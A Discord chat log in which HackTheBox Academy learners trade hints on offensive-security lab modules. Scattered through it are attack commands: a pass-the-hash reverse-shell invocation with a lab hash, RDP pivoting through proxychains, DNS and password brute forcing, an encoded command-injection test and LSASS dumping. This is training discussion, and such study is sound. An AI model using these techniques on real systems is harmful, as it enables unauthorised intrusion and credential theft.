#modules

1 messages · Page 93 of 1

rustic sage
#

whoever was using vmware to do hackthebox you get a W

misty current
#

I'm just thinking it might be this way, hoping anyone can correct me if I'm wrong
Return traffic is, it just sends the traffic back to where it came from, in this case (1) 172.16.5.19:8443 -> (2) 172.16.5.129:ARBPORT -> (3) (Internal Bind mapping for 172.16.5.129:ARBPORT and 172.16.5.129:8080) -> (4) 10.10.15.5:ARBPORT

rustic sage
#

You could get a traceroute and that’ll tell you.

misty current
#

The 3rd step is where the magic happens, and the ubuntu machine knowing to forward it to our machine, once it receives the packets from the windows host.

rustic sage
misty current
acoustic owl
#

In the medium Lab?
Check out all the services.
I still don't know which list you mean, but I suspect you are trying a brute force approach. If yes, this is the wrong way

red current
#

Has anyone here managed to get past the Exploiting Web Vulnerabilities in Thick-Client Applications yet? I'm running into an issue. I get to the point where I've created the fatty-client-new.jar and when I double click on it to open it, nothing happens. I went back and made sure I removed the hashes from the MANIFEST.MF file and altered the port number to 1337 in the beans.xml file as specified. Any idea why the fatty-client-new.jar isn't working?

misty current
rustic sage
misty current
#

traceroute measures the route based on TTL counts right? so I can only traceroute to the ubuntu host, not to the windows host. so my traceroute will only fetch the hops from my machine to the ubuntu machine and not any further right?

misty current
rapid sparrow
rustic sage
rustic sage
acoustic owl
misty current
rustic sage
surreal beacon
rustic sage
acoustic owl
brittle umbra
#

Hi all, in the module password attacks, PtT from Linux, can someone give me a hint on how to find svc_workstions keytab file. (I have a keytab file witouth the NTL hash) Or forge the tgt ticket? Im a bit lost :/

misty current
#

I believe tcpdump on the ubuntu host with filters would be right choice for knowing this.

#

@rapid sparrow the ubuntu host got tcpdump?

rapid sparrow
misty current
#

Ah right,

rapid sparrow
#

with sudo

misty current
#

Ah, you got root privs on it?

#

Nice

rapid sparrow
rapid sparrow
rustic sage
zinc marsh
#

any hint?

#

i arrived here

brittle umbra
#

What questions you can't answer?

misty current
#

you've successfully passed the white-list filters, now time to crush those black-list filters

surreal beacon
#

its so frustrating and i tried them all

#

htb is weird sometimes , feels like some guy made this lab while being sick

zinc marsh
acoustic owl
acoustic owl
surreal beacon
#

nobody knows

#

🙂

zinc marsh
surreal beacon
#

lets all put a like on that

zinc marsh
#

is passing the blacklist as well

#

i have been 1 hour trying to fix this

misty current
#

why's your payloading sitting in an image src?

zinc marsh
#

this is my burp request

zinc marsh
#

i got it

misty current
#

Ah, nvm for my question.

misty current
zinc marsh
#

||making a list for the whitelist, blacklist, magic bye and the content-type accepted||

#

||and just taking the double extension that let me run commands in the backend and the one which the page will think it is an image||

rustic sage
rustic sage
#

Got it, LOL.

pine dagger
#

@fossil crescent Hey, can I DM you regarding this? I've bypassed the WAF but not getting the email.

pine dagger
rustic sage
#

HTML Injection--> Module 'Introduction to web applications', What text would be displayed on the page if we use the following payload as our input: <a href="http://www.hackthebox.com">Click Me</a>

#

Answer --> Your name is Click Me

ionic abyss
#

ayyeee same @pine dagger from FN discord. Small community

pine dagger
#

Woo! HTTP Attacks all done. Was soooo close to the answer, just needed a little hint.

heavy marsh
#

Having issues with the getting started knowledge check

#

Can't upload my php reverse shell

#

the upload button is not working on the admin page

red current
#

Anyone here able to lend some assistance with the LDAP section in Attacking Common Applications?

#

I've tried everything I can think of and I seem to bypass the login.

#

Never mind. I figured it out.

analog dock
#

I’m stuck in the attacking common services hard lab. I got rdp creds for F, along with the other .txt files, know I can impersonate as J, found a linked server L, but I have no idea how to interact with it😅

analog dock
zinc marsh
analog dock
#

I found the linked server L

#

But I’m not sure how to interact with it

#

I also found a table called tb_users but I can’t seem to open it

zinc marsh
#

Communicate with Other Databases with MSSQL

#

there is a part called like that

#

in the sql section

analog dock
#

I know

#

But like I said, I can’t figure it out

#

@zinc marsh do you mind if I dm you so I can speak more freely?

zinc marsh
#

in the sql?

zinc marsh
analog dock
magic dune
#

academy HackTheBox isnt letting me unlock modules even tho i have enough cubes. Any idea why?

magic dune
#

Yeah i have 70 cubes and the module is 10. Im just doing the "Free" stuff

#

I press unlock and nothing happens or pops up

zinc marsh
magic dune
#

? there's one called Learning Process and it says Unlock for 10 cubes?

magic dune
#

Yeah

zinc marsh
#

i thought they were free

#

i dont remember

magic dune
#

It says its 10 cubes but gives you 10 cubes back so technically free

zinc marsh
#

if u click on unlock u cannot unlock them?

magic dune
#

No, all it does is slightly move everything to the left and when i click it again it moves back to the right

zinc marsh
#

close it and open it again maybe?

magic dune
#

Nothing, i even logged out and logged back in and still the same

zinc marsh
#

that is weird u are the first person i see with that issue

#

https://academy.hackthebox.com/achievement/664482/136 Finally, the skill assessment was crazy

ionic abyss
#

Hey does anyone know how the modules work post subscription? Like if I buy cubes but let me monthly subscription out I keep the courses I unlocked? But if I pay for a yearly subscription rather than cubes and have unlimited access below tier 2... Once that subscription is up I lose access to everything?

magic dune
zinc marsh
zinc marsh
ionic abyss
#

cool cool. Thank you

magic dune
rare topaz
#

No time limit to finish the modules + you can buy whatever module u want.

ionic abyss
sullen torrent
#

we are supposed to recurse the directories of the target machine and look for the flag but there are only 2 directories of the target machine and they both have files which dont have the required flag

#

help ._.

rare topaz
unborn adder
#

hey everyone, I'm currently on the ACL Enumeration part of the ACTIVE DIRECTORY ENUMERATION & ATTACKS Modules. I'm stuck at the last question What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word). I managed to find the answer via bloodhound but I can't get the correct answer format to submit 😭

unborn adder
craggy hound
#

Anyone done with the Intro to Windows Command Line?

#

I am stuck on user4 for hours

#

I have tried everything but I can't get the flag.

nimble fractal
#

You should take a look at the logrotate configuration files. I'm still trying to get this exploit to work though.

fierce pier
#

How should I brute force with Fiona user at attacking services easy lab?

steady hawk
steady hawk
fierce pier
#

Wym

steady hawk
#

It's a hint to the tool you should use

fierce pier
#

Lol yes hydra

#

I using hydra with rock you

#

And put full name

#

I tried with provided password list too

#

Neither works

steady hawk
#

Dm me your command if you want

nimble fractal
fierce pier
misty current
nimble fractal
white pebble
#

Hi

misty current
nimble fractal
misty current
#

If that's what you are referring to?

nimble fractal
misty current
#

Thanks for the insight

vital adder
vital adder
craggy hound
woeful adder
#

Hi

#

Ok I think i cant ask it

#

How can i nuke my own server

#

Its only me in there

vital adder
#

this isn't the place for that

woeful adder
#

Ok

rapid sparrow
#

done PM me for hints

modern falcon
#

Have you tried bruteforcing with a mutated password list?

modern falcon
#

tried crackmapexec, when i did that assessment i wasnt able to get the password with hydra, but i was able to get it using crackmapexec

#

also in my case, crackmapexec seems to run faster from the pwnbox than from my kali vm

blissful bane
#

hiii , i'm a newbie , just joined today ! happy to meet you all 🙂

rapid sparrow
#

I find the conf file and access.log file, and try to get the reverse shell back, and IDK how long it takes

gaunt monolith
#

Hi In pass attack- credentials hunting in linux Im mutation Loveyou1 password with custom rule and brute force using hydra in ssh but I don’t have any credentials to Kira !

fathom pendant
fathom pendant
gaunt monolith
keen compass
#

Hi, I am practicing the RDP session hijacking explained here and can't make it work https://academy.hackthebox.com/module/116/section/1171 .
Weirdly, every time I use tscon to do session hijack, I am asked to provide password. (I am, of course running this from SYSTEM privs)
I have also tried the "graphical way" using directly taskmgr as SYSTEM and it doesn't works...
Any idea of what could be wrongly done ?

rapid sparrow
#

Finally done with the updated one

keen compass
rapid sparrow
keen compass
#

do you mean that each time a module gets modified, you can "pass" it again ?

keen compass
#

ok, didn't knew that. so, does that also means that we must check for any module update before being able to finish the job role path ?

gaunt monolith
rapid sparrow
fathom pendant
keen compass
#

but perhaps you may need to auth other ways than ssh

fathom pendant
gaunt monolith
fathom pendant
keen compass
gaunt monolith
flint chasm
#

Hello All
Could you please help me with Easy lab from Attacking Common Services?
I got the username fiona
and also files from ftp
Now I don't know what to do with 50652.txt

#

idk what should I add in "PoC."

acoustic owl
flint chasm
#

I got the Web info txt file from ftp and there was info about CoreFTP

fathom pendant
#

There's a couple different ways to exploit

flint chasm
#

I'm not sure what to do now

#

I know that this website used Apache and I know the direcotry

#

I know that there is CoreFTP

sullen torrent
acoustic owl
flint chasm
#

ftp got only 2 files as I know

acoustic owl
flint chasm
#

pls help

acoustic owl
flint chasm
#

In which way should I go now

#

idk what can I do with this info

#

with this ftp files

acoustic owl
flint chasm
#

webshell

#

?

rustic sage
#

Development Frameworks & APIs --> Module 'Introduction to web applications' --->Use GET request '/index.php?id=0' to search for the name of the user with id number 1? answer == Target + index.php?id=1 in the browser.

acoustic owl
acoustic owl
coarse raven
#

How do I Terminate this so it stops using up my time?

fathom pendant
flint chasm
fathom pendant
#

The only thing that's limited (unless you buy cubes) is the in-browser vm (pwnbox)

coarse raven
#

from 59 to 56 minutes

fathom pendant
coarse raven
#

thank you @fathom pendant

fathom pendant
#

You can respawn the target an infinite amount of times

#

If you're using a personal vm with VPN there is no time limit

acoustic owl
flint chasm
#

using PUT

rapid sparrow
#

stuck with this

fathom pendant
#

Literally read the error, it tells you what went wrong

rapid sparrow
gaunt monolith
kind fern
#

Hi I have an issue in "RDP and SOCKS Tunneling with SocksOverRDP" module.

fathom pendant
kind fern
#

The .dll file extension will delete I do not know why I can't run regsvr32.exe SocksOverRDP-Plugin.dll.

atomic sigil
#

Hi. Is anyone done with Linux PrivEsc Environment Enumeration section? I've been looking for the flag for two days still can't find it

acoustic owl
fathom pendant
atomic sigil
plush hull
#

Hi

sweet jewel
#

hey guys, are there plans to have VPNs available for asia region?

gaunt monolith
dapper star
#

someone mind helping me with Pivoting, tunneling and port forwarding skills assessment? I'm stuck at this question:
For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation.

I know what to do, but need a hint about how.

misty current
#

Try revshell payloads for a reverse shell

misty current
dapper star
#

It's just the file transfer that is not working

#

need the lsass.dmp file on my own machine

#

but can't get it

misty current
#

what is the current working directory that you are in?

misty current
#

Which is a hassle, or you'd have to setup a way for your hostmachine to directly reach the windows machine and it's just a copy past from here

#

C:/Temp? that's where you land when you execute the web shell?

#

do a pwd and can you tell me what it says?

dapper star
misty current
#

In common webshells, your commands would always be executed in the same directory. You can read this #modules message if you want to understand why

#

To import modules and use them, you need to have a reverse shell, I believe you just can't do it from WebShells becuase every command you execute through webshells are packed in new sessions.

#

So pick up a simple payload from your favourite reverse shell site and get the reverse shell first

misty current
dapper star
#

Yeah, that's what I did. I'm currently with proxychains xfreerdp /v:... on the machine with the dump

misty current
#

Awesome, then you got two things you can do to dump it

#

copy paste or use xfreerdp /drive option to attach a drive and get the dumps

dapper star
#

proxychains xfreerdp /v:172.16.5.35 /u:mlefay /d:inlanefreight.htb /drive:\PIVOT-SRV01\Users\mlefay\AppData\Local\Temp
or
proxychains xfreerdp /v:172.16.5.35 /u:mlefay /drive:SHARE,\PIVOT-SRV01\Users\mlefay\AppData\Local\Temp
or
proxychains xfreerdp /v:172.16.5.35 /u:mlefay /drive:SHARE,C:/Users/mlefay/AppData/Local/Temp

is not the right way I assume? It is giving me errors all the time

misty current
#

you're launching xfreerdp from your attacker machine right?

dapper star
#

yea

misty current
#

You can only mount files from your attacker machine

#

not files from the remote machine

dapper star
#

Thanks for reminding me that I'm dumb

dapper star
misty current
#

Really? Hmmm, weird.

misty current
#

/drive:SHARE,/tmp/
means inside the rdp you can access,
the files inside /tmp with \\TSCLIENT\SHARE\

#

Ah

#

keep hitting R and Enter

#

To import remote modules, you'd have to the script execution policy

#

normall, if you were doing this from a GUI, you'd have a prompt that says "Do you want to run? [Press R]" something like that

#

but in reverse shell cases, you won't see that prompt, except that prompt listening for you (which in this case, you think it's freezed)

dapper star
misty current
#

You could do Set-ExecutionPolicy -Policy Bypass -Scope Process but it'll still ask you I guess.

misty current
#

GUI -> goto the mounted drive, you should see it in the This PC menu
Command line -> use the copy the command

dapper star
#

I'm prob doing the most stupid things

misty current
#

you got the dump inside the mount, that's all lol

#

you should now be able to see it in your machine where the mount root is

#

how many times did you press r and enter?

#

just once?

rustic sage
#

hhahahahaha funny

misty current
#

Okay, I was facing this problem once, I don't remember, maybe try A and enter

rustic sage
#

what my name

#

who farted in my name

misty current
#

also you're doing it like
r
r
r
and not rrrr right?

rustic sage
acoustic owl
misty current
#

also, captial R

#

not small r

misty current
#

if that's not it either, then it's something else.

misty current
#

@amber marten I'm thinking for .ps1 it might be different. but for Importing .psd1 modules you'd have to hit R multiple times

#

Like this is note I made when I faced this

twin hearth
#

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

#

can someone give hint on this "footprinting" module

#

dns enumeration

#

i ve been trying so long and cannot find anything please help me

wraith mural
#

same

twin hearth
#

dnsenum --dnsserver 10.129.138.136 --enum -p 0 -s 0 -o found_subdomains.txt -f /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt inlanefreight.htb

sleek urchin
#

Doing Using CrackMapExec : Skill Assessment and currently stuck on the foothold, I managed to brute rid and i don't know how to proceed

#

any help is well appreciated

wraith mural
#

ah, figured it out, had to think a bit more about what was happening 😁

acoustic owl
acoustic owl
twin hearth
#

im getting no response if i try bruteforcing the subdomains

#

dnsenum --dnsserver 10.129.138.136 --enum -p 0 -s 0 -o found_subdomains.txt -f /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt mail1.inlanefreight.htb

#

same with app.inlanefrieght.htb

crimson walrus
#

Hello everyone! I need help with the module "ATTACKING WEB APPLICATIONS WITH FFUF", section "Parameter Fuzzing - GET". I cannot seem to find the right parameter. I believe I found all directories and .php files. I tried fuzzing every one that I found but with no luck. Can anyone help me?

nimble fractal
rapid sparrow
undone cypress
#

Hello, there are seniors on Windows PE.
Windows Privilege Escalation Skills Assessment - Part I
Q-2
What is the secret of finding the ldapadmin password with the privileges with which we log in?
Without an administrator, the password is NOT searched.
How should we have searched for it correctly starting with the second question, and not when we had already increased the privilege and did not launch - ||LaZagne.exe||

nimble fractal
acoustic owl
acoustic owl
gentle root
#

File upload attacks got a crazy twist on the skills assessment lol

rustic sage
acoustic owl
misty current
rustic sage
rustic sage
#

I deduced it from the question and as such it is obtained with the target + the GET request to obtain the user's name.

#

target/index.php?id=1

#

You get the answer

#

I try to do the questions without help to get a better understanding but there are others that I find difficult and I ask for help from all colleagues.

whole grotto
#

Hi ! I'm a little bit stuck in the password attack module : "What is the default password of every newly created Inlanefreight Domain user account?" can i have another hint pls i didn't find the script

#

don't

clear lion
#

did you reed the pdf? i think is that question

whole grotto
#

which pdf ?

clear lion
blazing crypt
#

Linux Privilege Escalation

Logrotate

Did anyone get this to work?

keen compass
#

On ATTACKING COMMON SERVICES > Attacking DNS (https://academy.hackthebox.com/module/116/section/1512) : when using subbrute I am always getting a warning message : Warning: No nameservers found, trying fallback list.
Does some of you know why I am getting this ?

I have tried on a test zone locally and don't get this warning. I am also able to communicate with the dns server referenced within resolvers.txt file using dig / host.

acoustic owl
keen compass
#

after enabling verbose mode and running Wireshark, I realize that this seems to be because the target DNS server doesn't accept ANY as query type... I may need to find another tool that will use all types of query perhaps

acoustic owl
keen compass
#

ouch !

#

spend about 2 hours, trying from both my kali and the pwnbox lol

obtuse niche
#

Rip. Well at least you got it sorted ❤️

raven zodiac
#

Im stuck on password attacks ,network attacks

#

WINRM 10.129.202.136 5985 WINSRV [-] WINSRV\user.list: "SpnegoError (16): Operation not supported or available, Context: Retrieving NTLM store without NTLM_USER_FILE set to a filepath"

#

I keep getting this when I run my Winrm command

#

and I downloaded the lists from the recourses button up top

keen compass
keen compass
raven zodiac
#

it's username.list. damn thank you lol

raven zodiac
#

whats the command to open a flag.txt file?

fathom pendant
raven zodiac
#

linux

fathom pendant
#

Should be able to use cat

raven zodiac
#

I keep trying cat flag.txt

#

nothing

fathom pendant
#

As in it gives you an error or it's empty. If it's the file not found error, are you sure you're in the right directory?

raven zodiac
#

Evil-WinRM PS C:\Users\john\Documents> cat flag.txt
Evil-WinRM PS C:\Users\john\Documents>

fathom pendant
#

Oj

#

OHHH

raven zodiac
#

like this cant send an ss here

#

yeah

fathom pendant
#

dude

#

You're on a windows machine

raven zodiac
#

what am i missing

fathom pendant
#

type flag.txt

raven zodiac
#

no im on parrot terrminal

#

Evil-WinRM PS C:\Users\john\Documents> type flag.txt
Evil-WinRM PS C:\Users\john\Documents>

fathom pendant
#

Brother

raven zodiac
#

same thing

fathom pendant
#

You are remoted to a windows machine

#

Also is the flag.txt in that directory?

raven zodiac
#

yes I checked

#

yes i get what you mean now by windows. my bad

fathom pendant
#

Also what module are you doing?

raven zodiac
#

network services

#

in password artacks

fathom pendant
#

Can't you just rdp in?

#

To verify that it's not blank?

raven zodiac
#

yeah but im this far lol. might take a break and try that

fathom pendant
#

Like I said though evil-winrm has a download feature you can use to download the file

#

¯_(ツ)_/¯

gentle root
zinc marsh
dapper star
#

Can I PM someone about password attacks-hard? Will give away too much spoilers if I do it here

fathom pendant
#

It's a lot of back and forth

dapper star
#

Yeah, but I got stuck somewhere I didn't think I would get stuck... So just want to know if I'm just stupid or that there is really a problem

summer lava
zinc marsh
#

# bash<<<$(base64 -d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDEK)

#

am i writing something wrong here?

pine dagger
#

66 modules done. 10 modules to go. 🙂

magic dune
#

Is this a good order to learn things? Its all fundamentals or intro. (Top being 1 and going down from there)

fathom pendant
#

Getting started should probably be first

magic dune
#

I was thinking that as well but it says i should have a firm understanding of these other things to be able to complete it

fathom pendant
#

But I'd say doing the infosec fundamentals path should be first

magic dune
#

I mean i got all of these minus 2 from the infosec foundation path. I just dont have enough cubes to go through that whole thing

fathom pendant
#

¯_(ツ)_/¯

surreal beacon
#

yo guys

#

anyone familiar?

red current
#

Has anyone run into issues using the gitlab_userenum.py tool? I had no problem using it earlier on the module, but I'm trying to use it now in the assessment and no matter how I try to run it, I either get an access denied error or it says the --wordlist that I'm pointing to doesn't exist.

red current
surreal beacon
#

@red current the sa credentials

zinc marsh
surreal beacon
#

how can i use it to login to the database?

zinc marsh
magic dune
zinc marsh
zinc marsh
red current
#

Is anyone available to provide assistance with the Attacking Common Applications Skills Assessment II? I answered the first question and can't seem to get any further with anything I attempt to use.

lyric igloo
#

Guys if I wanna start learning programming, do I need a laptop with high specifications or anything would work ?

#
  • are Harvard courses can be considered as a good option to learn or gotta find another thing ?
pine dagger
#

You dont need high spec laptops to start learning programming

#

Its not like you're going to be coding programs with 100,000 lines of code to start with

lyric igloo
#

I see thanks you!

wispy aspen
#

There are so many free programming educational resources that the best option is whichever one works for you

#

If the Harvard one is free and you vibe with it, go for it

lyric igloo
zinc marsh
#

someone could give me a hint, I got run 'ls' command

wispy aspen
#

Harvard sounds as good as any others, I mean, it's fricken Harvard

zinc marsh
#

they are really good*

lyric igloo
#

Hard or so so ?

zinc marsh
lyric igloo
#

Makes sense

zinc marsh
lyric igloo
#

Do they give a certificate?

zinc marsh
#

there are some free courses there

lyric igloo
#

Yup I read about that

zinc marsh
#

the one i did is not there because it was for the last year

zinc marsh
lyric igloo
#

Pretty nice

lyric igloo
#

I think I have to join it

lyric igloo
zinc marsh
storm skiff
#

Hey guys, I'm working on Skill Assessment - Broken Authentication. I have ||a list of valid users||. I don't know how to ||brute force the login page and avoid rate limiting using the rockyou.txt file||. I'm also not sure if ||I used the right regex to limit the rockyou.txt wordlist||. Can anyone help?

zinc marsh
dapper star
#

I can't anymore... Password attacks - hard. I found 3 passwords and none of them is working to unlock the vhd file

fathom pendant
#

Its a simple password

dapper star
#

It's time for a break

#

It's insane that I didn't try that before

latent sigil
#

hi.

#

im having trouble with the password attacks module

#

especially with the Pass the Ticket (PtT) from Linux questions

#

Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.

#

i have found the flag but am unable to submit it

#

is there a bug here or somehting wrong?

latent sigil
#

i have tried converting it to base 64

#

downloading the file

#

everything

#

it might be a bug in the htb

gusty zinc
#

Can anyone assist me with the following module? I cant get this answer

Module:  INFORMATION GATHERING - WEB EDITION
Page 7 Active Subdomain Enumeration
What is the FQDN of the IP address 10.10.34.136?

nslookup -query=PTR <IP> ns.inlanefreight.htb 
dig -x 10.10.34.136 @ns.inlanefreight.htb 
latent sigil
#

which question you at @gusty zinc

gusty zinc
#

What is the FQDN of the IP address 10.10.34.136?

latent sigil
#

try zone swap

gusty zinc
#

did that, no domain in the output matches the .136

latent sigil
#

if i remember theres a internal.

#

try zone transfer with that

#

add me on discord

#

ill try and help (i did the module)

steady hawk
latent sigil
#

done

thorn urchin
fast silo
#

Hi, i am working on the module "ATTACKING COMMON SERVICES " part "Attacking FTP"

The target box keeps the port i need to attack close, i had just one box with the right port open all other boxes keeps the port close. Who can help me ?

autumn pilot
#

reset the target until the port is opened

#

it could take a reset or two, but also make sure to give it 3-4 minutes to load

fast silo
#

I did already 4 resets, and the box which is running now is already up for 32 minutes

#

It's a bit annoying, i just want to complete the path for the Academy

autumn pilot
#

🤷‍♂️

fast silo
#

No one here with knowledge of those boxes who can look into it ?

autumn pilot
#

well, reset it until the port comes up

fast silo
#

Hmm, too bad

acoustic owl
analog dock
fast silo
#

Yes it certainly is, especially since it is quite a simple module, and then it takes so much time

fast silo
#

After 19 resets i finally found one box with the port open

rapid sparrow
#

Debug the attached binary to find the flag being pushed to the stack

#

Anyone done this?

vivid igloo
#

ayo

#

i need some help with this : Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.

#

can't find non

fiery berry
#

I would advise to read the man page for cURL

lyric raft
acoustic willow
#

And how to do it ? Check the task about enumeration users

#

Don’t forget to filter with website’s requirements from file rockyou.txt

gloomy kindle
#

Hey guys! I am currently in a CS class and I have to scrape a website and was wondering if anyone here know of any good, free Web Crawlers that I could use? The website that I'm gonna scrape might be relatively large, so something that could handle that would be nice. Any help on this would be greatly appreciated!

pallid brook
#

Good morning chat, i have an issue with the IMAP/POP3 section of foot printing. to be precise it is this question " What is the admin email address?"

#

i was able to get the email address after accessing the imap server and retrieving the flag. But my question is was there a way to get the "admin email address" without accessing the imap server

#

there was no hint to tell us it was on the imap server. I just guessed that was the mail and it worked

serene kelp
#

Hi, I'm trying to contact support regard some problem with billing, but I can't get "live person" via support chat. There is no option "Send us a message". Adblocker is disabled for thissite ofc...

wispy aspen
surreal beacon
#

??

plain coral
narrow solar
#

good afternoon friends, can i upload pics here?

pallid brook
wispy aspen
analog dock
#

At least I’m able to

gaunt monolith
#

In passwd,shadow&opasswod I need to crack unshadow.hashes using hashcat and rockyou.txt but It’s take a lot of time this is normal ?

analog dock
gaunt monolith
#

Use file in res maybe make it quick ?

#

I’ll try

#

Nothing change

analog dock
gaunt monolith
#

Password Attack- passwd.shadow&Opasswd

analog dock
#

Made from the pws.list provided + the custom.rule

gaunt monolith
#

Ya I’ll try also I made this list in previous questions

analog dock
#

👍🏼

gaunt monolith
analog dock
autumn pilot
#

you can ask on behalf of the ticket (user) you already have for another one

narrow solar
autumn pilot
#

try to check the kerberos tickets that are integrated into your session and use the full UNC path (FQDN)

narrow solar
analog dock
rapid sparrow
#

IK everyone almost focus on CPTS and CBBH path, but assembly is also fun sadglas

#

INTRO TO ASSEMBLY LANGUAGE - Procedures

ancient kindle
#

I have a question about "impacket-smbserver", If anyone is able to help.

fiery berry
ancient kindle
#

It has to do with (Password Attacks Lab - Hard)

#

When I set a share with User&Pass using (impacket-smbserver) and then try to transfer files. I get "access is denied".

onyx rapids
#

INTRODUCTION TO NOSQL INJECTION - Skills Assessment 2

Can someone help me with finding the injection point? I've tried FFUF, nosqlmap, and Burp-NoSQLiScanner, but none of them can find the injection.

onyx rapids
# acoustic owl Look to the dot

omg lol, sadistic people behind this one. I suppose the rest of the module was fairly easy, so they needed to throw in a curveball

rustic arrow
#

Module: Password Attacks
Section: Pass the Hash (https://academy.hackthebox.com/module/147/section/1638)

Was anyone able to use Invoke-TheHash for the last question?

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

I can't find out why it isn't working. I copy-pasted the command line shown in the explanation part and I had no output:

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <payload crafted>"

Anyway, I got the flag using chisel, then evil-winrm to the DC01.

thorn urchin
#

read the options for secretsdump

heady geyser
#

need a hand for the skills assessment for pivoting and tunneling. I pivoted from the linux jump host to the first windows machine using proxychains xfreerdp and creds for mlefay. the question is asking about "which user is vulnerable". I saw the hint mentioning using "lsass". I have created a dump of lsass and am now stuck on how to get that file over to my attack host. do i take the dump file and move it to the linux jump host first? or do i get a meterpreter reverse shell to the windows machine, but how would that help? I'm lost.

thorn urchin
#

well what errors did you get

thorn urchin
heady geyser
# thorn urchin I mean up to you. However youre most comfortable doing file transfer is your cal...

maybe im missing something. I'm not on the same network as the windows machine that has the dump file. so doing a typical file transfer method would never work, right?(i tried using smbserver and it did not work). So i was thinking of transferring the file from the internal windows machine to the linux jump host, but none of my tools are on the jumphost. I feel like im missing something easy.

thorn urchin
#

hmm I dont believe that error should matter

thorn urchin
#

could also open up a new port forward for the file transfer

#

or get a meterpreter beacon running

#

or use a different tunnel method

#

this isnt a wrong answer situation, its a whatever works situation

heady geyser
#

is there a "best practice" answer?

thorn urchin
#

no, its environment and opsec dependant

#

and the cpts doesnt cover opsec

#

so its whatever works for you

heady geyser
#

cool, thanks for the help

thorn urchin
#

is .50 even the DC? idr

#

rough keep at it

misty current
#

does svc_sql have the right privs to dump the ntds?

thorn urchin
#

@amber marten btw you should remove the spoiler password from your posts, its a lab assessment

#

from my searching that error shouldnt matter and can be ignored

misty current
#

try targetting a specific user, to see what kind of output you get

#

-just-dc-user administrator

thorn urchin
#

👍

rustic sage
#

hi guys bro

misty current
#

[-] Cannot create "sessionresume_PlbBSNvK" resume session file: [Errno 13] Permission denied: 'sessionresume_PlbBSNvK'
I wonder what this error is, some kind of resume file like potfiles in hashcat?

surreal beacon
acoustic owl
zinc marsh
#

I have tried all the HTTP Verbs, I had thought using command injection with verb tampering but not sure if it is the intended way

misty current
zinc marsh
misty current
#

a quick look at wapplyzer should tell you I guess

zinc marsh
#

ubuntu linux

#
http://159.65.60.16:31443 [200 OK] Apache[2.4.41], Bootstrap[3.0.3], Country[UNITED STATES][US], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[159.65.60.16], JQuery[2.1.3], Script, Title[File Manager]```
zinc marsh
misty current
#

There is one more, but I'm not sure if it'll work with linux as it's more of a iis implementation but,

#

||TRACK||

autumn pilot
#

the verb is one of the common ones

zinc marsh
misty current
#

oh, then you haven't tried all the common ones pika_sip

rustic sage
#

instagram accont panel

#

code

autumn pilot
#

finding the verb is part of the exercise, getting the flag is the other part

zinc marsh
autumn pilot
#

yes, but with the appropriate parameter verb

rustic sage
#

my faulyt

#

okey bro good night

zinc marsh
rustic sage
#

how do i can deobfuscate the js code's ?

surreal beacon
autumn pilot
#

looks like you need a key

oblique turtle
#

Is anybody able to assist me with the KERBEROS ATTACKS module?
It isn't a module specific question, I am more confused with how it wants me to connect to a machine.

Thanks!

autumn pilot
#

which section

dull vortex
#

Having trouble with Attacking Common Services, DNS. Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

#

dig is not working, and subbrute is not giving me a flag

oblique turtle
#

Not sure how to connect or what it means for this?

autumn pilot
#

the spawned target is DC01, after you have done the needed steps you can then connect to it via tools available in both the workstation and your local vm assuming you have kali or parrotos

#

also in the section is shown how the connection is made

oblique turtle
autumn pilot
#

what about the hosts file

oblique turtle
bitter abyss
#

Hello, little suggestion. Could you please add a functionnality for mark as uncompleted when we mark as completed ?

static roost
#

Anyone wanna give feedback on my report from Documentation and Reporting module? Already had someone do QA for the Executive Summary. Need someone with more technical experience to look at and judge the rest.

quasi wave
#

hi can someone help me with the privilege escalation challenge in Getting Started module?

misty current
static roost
#

@misty current Cool! can I pm?

misty current
#

Yup

quasi wave
#

I am trying to forward an ssh key to remote server's folder so I can log into user2 from user1 for privilege escalation but its saying permission denied

#

this is for the privilege escalation challenge in the Getting Started module of CPTS path

#

which is 2nd module in path

#

hint is better than giving me answer please

#

actually don't just give me answer because I don't learn that way

thorn urchin
#

also why transfer the key over and not just ssh with it directly?

quasi wave
#

oh well hold on let me try it

#

but it can't possibly let anyone just generate a random ssh key and let them use it to log on as just any user tho that would be crazy

thorn urchin
#

oh def not, I thought you were saying you had user2's ssh key already

quasi wave
#

no

#

I don't

#

I'm trying to get into user2's account but I only have user1

thorn urchin
#

okay, so then why are you messing around with ssh keys then?

quasi wave
#

because I thought generating ssh keys can help with privilege escalation. I will be back in ten minutes but can you DM me so I can get back to you soon?

thorn urchin
#

it can only help if you have a blind write to the target user's .ssh directory

#

otherwise it can work for some persistence if say you only have access to user1 via an exploit shell but want ssh access

#

but thats different than priv esc

quasi wave
#

ok hold on I will be back in ten minutes

#

help someone else in the meantime

quasi wave
#

hi I'm back

lofty wave
#

Question for the SQL Injection Fundamentals module. I've already gotten the assessment flag. Has anyone tried any alternate ways of getting into this target. For example I'm messing around with reverse shells, meterpreter, and the like. Anyone else tried it?

thorn urchin
#

sir this is discord not google search

#

you gotta actually ask a question if you want help

dull vortex
#

lol my bad, that was for the search bar in here not google

lofty wave
vapid drum
#

I'm stuck on the skills assessment for Attacking Web Applications With Ffuf. I found the subdomains and extensions. When I try to find the page I get nothing besides some empty pages. I don't think I'm overthinking it but who knows. I could be.

lofty wave
vapid drum
#

I'm dumb

#

lol

lofty wave
#

Lol nah, just stick to it. Sometimes taking a step away for a bit helps. Come back with fresh eyes.

